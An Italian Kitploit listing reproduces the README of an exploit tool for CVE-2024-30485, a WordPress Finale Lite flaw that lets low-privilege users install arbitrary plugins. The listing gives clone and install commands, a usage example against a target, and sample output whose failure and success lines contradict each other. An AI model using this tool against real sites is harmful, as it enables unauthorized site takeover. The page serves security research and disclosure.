Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/nxploited/cve-2024-30485
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-30485

CVE-2024-30485

Plugin WordPress Finale Lite <= 2.18.0 - Vulnerabilità di installazione/attivazione arbitraria del plugin per utenti Subscriber+

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-30485 Exploit

📌 Panoramica

CVE-2024-30485 è una vulnerabilità ad alta severità trovata nel plugin Finale Lite per WordPress (versioni <= 2.18.0). La vulnerabilità consente a utenti autenticati (Abbonato+) di installare e attivare plugin arbitrari senza adeguata autorizzazione.

  • Gravità: ALTA (CVSS 8.8)
  • Versioni interessate: Finale Lite <= 2.18.0
  • CWE: CWE-862 (Autorizzazione Mancante)

🚀 Caratteristiche

  • ✅ Verifica se un sito WordPress è vulnerabile
  • ✅ Autenticazione con credenziali valide
  • ✅ Estrazione del nonce di sicurezza
  • ✅ Installazione di plugin arbitrari
  • ✅ Attivazione dei plugin installati

🛠 Requisiti

  • Python 3
  • Moduli requests e beautifulsoup4
  • Sito WordPress target con un plugin vulnerabile
  • Credenziali WordPress valide (abbonato+)

📜 Installazione

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485

# Install dependencies
pip install -r requirements.txt

🔍 Utilizzo

root@kitploit:~
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi

positional arguments:
  plugin                Plugin slug

options:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET  WordPress site URL
  -U USERNAME, --username USERNAME  WordPress username
  -P PASSWORD, --password PASSWORD  WordPress password

Esempio:

root@kitploit:~
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments

🖥 Esempio di Output

root@kitploit:~
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}

⚠️ Disclaimer

Questo script è solo per scopi educativi e di ricerca sulla sicurezza. Il test non autorizzato su sistemi senza permesso è illegale. Usalo in modo responsabile.

🔗 Riferimenti

  • Record CVE ufficiale
  • Pagina del plugin WordPress

Di: Khaled Alenazi (Nxploit)

Scarica lo strumento